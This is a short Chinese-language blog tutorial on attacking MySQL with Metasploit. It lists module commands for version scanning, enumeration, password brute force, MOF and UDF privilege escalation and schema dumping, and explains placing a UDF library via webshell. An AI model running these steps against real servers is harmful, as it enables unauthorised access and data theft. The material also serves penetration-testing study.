mysql 案例 ~ mysql安全滲透測試


一 簡介 Metasploit是一款可以從多種角度進行勘測的滲透工具

二 使用

  1 安裝
     curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
  2 使用
     msfconsole 進入終端
  3 特定命令
     1 掃描mysql版本
       use auxiliary/scanner/mysql/mysql_version
     2 獲取相關信息(包括數據庫數據目錄和相關用戶等)
       use auxiliary/admin/mysql/mysql_enum
     3 密碼字典暴露破解
      use auxiliary/admin/mysql/mysql_sql 
      set pass_file "/root/top10000pwd.txt"
      run
   4 根據用戶密碼提權
      use exploit/windows/mysql/mysql_mof
      run
   5 udf 提權
      exploit/multi/mysql/mysql_udf_payload
      run
  6 將mysql_schem導出到本地 /root/.msf4/loot/文件夾下
    use auxiliary/scanner/mysql/mysql_schemadump

三  常用命令 

   1 search mysql 查找mysql相應模塊
   2 凡是沒有標注的都需要填寫用戶名等信息
四 補充
  1 udf提權
     1 UDF(user defined function)用戶自定義函數,是mysql的一個拓展接口。用戶可以通過自定義函數實現在mysql中無法方便實現的功能,其添加的新函數都可以在sql語句中調用,就像調用本機函數一樣。
     2 需要使用webshell找到mysql的安裝目錄,並在安裝目錄下創建lib\plugin文件夾,然后將udf.dll文件導出到該目錄,創建類似xCzaUwje.so這樣的文件
     3 調用 sys_exec(),需要創建觸發器獲取插件目錄和進入mysql庫權限
     4 執行前提
        1.獲得一個數據庫賬號,擁有對MySQL的insert和delete權限。以root為佳。
        2.擁有將udf.dll寫入相應目錄的權限。
        3 需要mysql 5.7 開啟 secure_file_priv 為非NULL,以下是補充
            secure_file_priv參數用於限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()傳到哪個指定目錄。
            secure_file_priv 為 NULL 時,表示限制mysqld不允許導入或導出。
           secure_file_priv 為 /tmp 時,表示限制mysqld只能在/tmp目錄中執行導入導出,其他目錄不能執行。
           secure_file_priv 沒有值時,表示不限制mysqld在任意目錄的導入導出。
五  總結
  1 不同權限用戶的泄漏會導致不同的信息模塊的收集,有些可能會因為權限不足執行失敗
   2 對於某些漏洞的掃描大多基於特定版本,比較落后,沒有什么參考必要
六  推薦網站
    https://www.freebuf.com/

七 補充一些其他數據庫的工具   

  1 oracle
    Oscanner tnscmd10g sidguesser
 2  sql-sever
     mdb-sql sqldict sqlninja
3   sql滲透測試 sqlmap


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM